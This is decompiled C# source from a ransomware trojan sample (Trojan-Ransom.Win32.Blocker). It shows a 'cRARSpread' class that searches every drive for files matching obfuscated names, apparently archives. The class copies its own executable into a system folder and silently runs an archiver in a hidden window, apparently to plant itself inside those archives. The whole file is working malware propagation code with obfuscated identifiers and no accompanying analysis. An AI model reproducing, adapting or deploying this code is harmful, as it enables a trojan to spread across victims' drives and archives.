// Decompiled with JetBrains decompiler // Type: Stub.cRARSpread // Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe using A; using System; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Stub { public class cRARSpread { private static string ce9ee9bdc267a842d3ef926289d8e02c2; [DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)] private static extern int cf4947a2d3263e417979f2a8d6a63fe5f( [MarshalAs(UnmanagedType.LPTStr)] string c31bc76e1a9d760d9aeac01c0ca5d54d3, [MarshalAs(UnmanagedType.LPTStr)] StringBuilder cc505c0b6198cb488994f0dda564f1c32, int c06afa0370bf8e9e19b50aef2a782433f); private static void cf93e0385f1c9b9b9fc9168df531885a0(string c23d3141ec47285c032d83ba6aa914036) { try { foreach (string file in Directory.GetFiles(c23d3141ec47285c032d83ba6aa914036)) { if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(322))) cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file); if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(331))) cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file); } foreach (string directory in Directory.GetDirectories(c23d3141ec47285c032d83ba6aa914036)) cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(directory); } catch { } } public static void RARSpread() { try { cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2 = Process.GetCurrentProcess().MainModule.FileName; foreach (string logicalDrive in Environment.GetLogicalDrives()) cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(logicalDrive); } catch { } } private static void cc62e4c9f9f6eaec701227263483768c8(string c591e77c72aaa11ae89d3e0a04677b964) { try { string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340))), string.Empty) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340); string path = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(343); if (!File.Exists(path)) return; if (!File.Exists(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2))) File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2)); StringBuilder cc505c0b6198cb488994f0dda564f1c32_1 = new StringBuilder((int) byte.MaxValue); cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2), cc505c0b6198cb488994f0dda564f1c32_1, cc505c0b6198cb488994f0dda564f1c32_1.Capacity); StringBuilder cc505c0b6198cb488994f0dda564f1c32_2 = new StringBuilder((int) byte.MaxValue); cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(c591e77c72aaa11ae89d3e0a04677b964, cc505c0b6198cb488994f0dda564f1c32_2, cc505c0b6198cb488994f0dda564f1c32_2.Capacity); try { ProcessStartInfo startInfo = new ProcessStartInfo(); string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(380) + cc505c0b6198cb488994f0dda564f1c32_2.ToString() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + cc505c0b6198cb488994f0dda564f1c32_1.ToString(); startInfo.FileName = path; startInfo.Arguments = str; startInfo.WindowStyle = ProcessWindowStyle.Hidden; Process.Start(startInfo); } catch { } } catch { } } } }